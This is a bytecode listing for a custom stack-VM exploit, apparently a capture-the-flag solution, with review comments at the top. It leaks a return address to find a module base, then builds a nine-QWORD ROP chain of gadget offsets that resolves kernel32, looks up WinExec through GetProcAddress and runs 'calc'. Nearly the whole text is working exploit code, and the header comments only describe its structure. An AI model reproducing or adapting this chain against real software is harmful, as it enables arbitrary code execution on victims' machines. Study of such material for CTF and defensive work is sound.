; --------------------------------------------------------------------
; swisscheese.yarasm -- stack-VM bytecode listing (reviewed copy).
;
; Structure of this listing (as visible here; VM semantics of the OP_*
; mnemonics are not defined on this page and are read from their names):
;   1. init: load mem slot 0x11, mask to 32 bits, subtract a constant
;      (0x38F2) and store the result in mem slot 0 ("base").
;   2. nine "write QWORD n" sections: each composes one 64-bit word as
;      (high << 32) | low via OP_PUSH raw 32 / OP_SHL / OP_BITWISE_OR and
;      stores it with OP_POP_M into slots 0x11 .. 0x19 in order.
;   3. OP_NOP / OP_HALT.
;
; NOTE(review): every code address in the chain is "base + hard-coded
; offset", so the listing is tied to one specific build of the target;
; a different layout of that module invalidates all of the offsets.
; NOTE(review): the literal pushes "kernel32", "WinExec" and "calc" are
; the plain-text, build-independent indicators in this payload.
; --------------------------------------------------------------------
; I have 18 DWORDS on the stack. then a pointer i must touch, then whatever i want
; so 9 QWORDS
OP_PUSH_M raw 0x11
OP_PUSH raw 0xFFFFFFFF
OP_BITWISE_AND
; stack: [orig retaddr]
OP_PUSH raw 0x38F2 ; offset of orig retaddr from base
OP_INT_SUB
OP_POP_M raw 0 ; save base address to Mem
; mem: [baseaddr], stack:[]
; --------------------------------------------------------------------
; end of init
; --------------------------------------------------------------------
; write QWORD 1
; add base to gadget offset
OP_PUSH_M raw 0
OP_PUSH raw 0x51108 ; :call GetModuleHandleExW
OP_INT_ADD
OP_PUSH raw 2 ; GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT
OP_PUSH raw 32
OP_SHL
OP_BITWISE_OR
OP_POP_M raw 0x11
; write QWORD 2
OP_PUSH wide "kernel32"
OP_PUSH reloc 0 ; some random address here
OP_PUSH raw 32
OP_SHL
OP_BITWISE_OR
OP_POP_M raw 0x12
; write QWORD 3
OP_PUSH reloc 0 ; will be put in ecx, used later to not crash
OP_PUSH_M raw 0
OP_PUSH raw 0x5E29
OP_INT_ADD
OP_PUSH raw 32
OP_SHL
OP_BITWISE_OR
OP_POP_M raw 0x13
; write QWORD 4
OP_PUSH raw 0 ; junk in ebp
OP_PUSH_M raw 0
OP_PUSH raw 0x2a1ec ; offset to mov eax, [eax]; ret
OP_INT_ADD
OP_PUSH raw 32
OP_SHL
OP_BITWISE_OR
OP_POP_M raw 0x14 ; will put 0 in ebp
; write QWORD 5
OP_PUSH_M raw 0 ; BASE
OP_PUSH raw 0x368ca ; offset to mov edx,eax;...; mov [ecx],edx; ret - ecx must be a valid pointer
OP_INT_ADD
OP_PUSH_M raw 0
OP_PUSH raw 0x1a61 ; offset to pop ecx, ret
OP_INT_ADD
OP_PUSH raw 32
OP_SHL
OP_BITWISE_OR
OP_POP_M raw 0x15
; can't touch EDX
; write QWORD 6:
OP_PUSH_M raw 0
OP_PUSH raw 0xc9064 ; subtracted 44 hex to account for later gadget offset to getprogaddress address
OP_INT_ADD
OP_PUSH_M raw 0
OP_PUSH raw 0x37995
OP_INT_ADD
OP_PUSH raw 32
OP_SHL
OP_BITWISE_OR
OP_POP_M raw 0x16
; write QWORD 7 - GetProcAddress + target proc
OP_PUSH_M raw 0
OP_PUSH raw 0x4ca6d ; mov esp+4, edx ; (hmodule), jmp eax
OP_INT_ADD
OP_PUSH_M raw 0
OP_PUSH raw 0x51115 ; :ret ; instead of: raw 0x101eb ; pop ebx, pop ebp; ret
OP_INT_ADD
OP_PUSH raw 32
OP_SHL
OP_BITWISE_OR
OP_POP_M raw 0x17
; write QWORD 8
; second arg for WinExec + ret address
OP_PUSH raw 0 ; leave room for handle
OP_PUSH ascii "WinExec"
OP_PUSH raw 32
OP_SHL
OP_BITWISE_OR
OP_POP_M raw 0x18
; write QWORD 9 (slot 0x19 is the last of the nine slots declared above)
OP_PUSH_M raw 0
OP_PUSH raw 0x101e4 ; call eax;
OP_INT_ADD
OP_PUSH ascii "calc"
OP_PUSH raw 32
OP_SHL
OP_BITWISE_OR
OP_POP_M raw 0x19
; --------------------------------------------------------------------
; end of rop
; --------------------------------------------------------------------
OP_NOP
OP_HALT
; --------------------------------------------------------------------
; end of code
; --------------------------------------------------------------------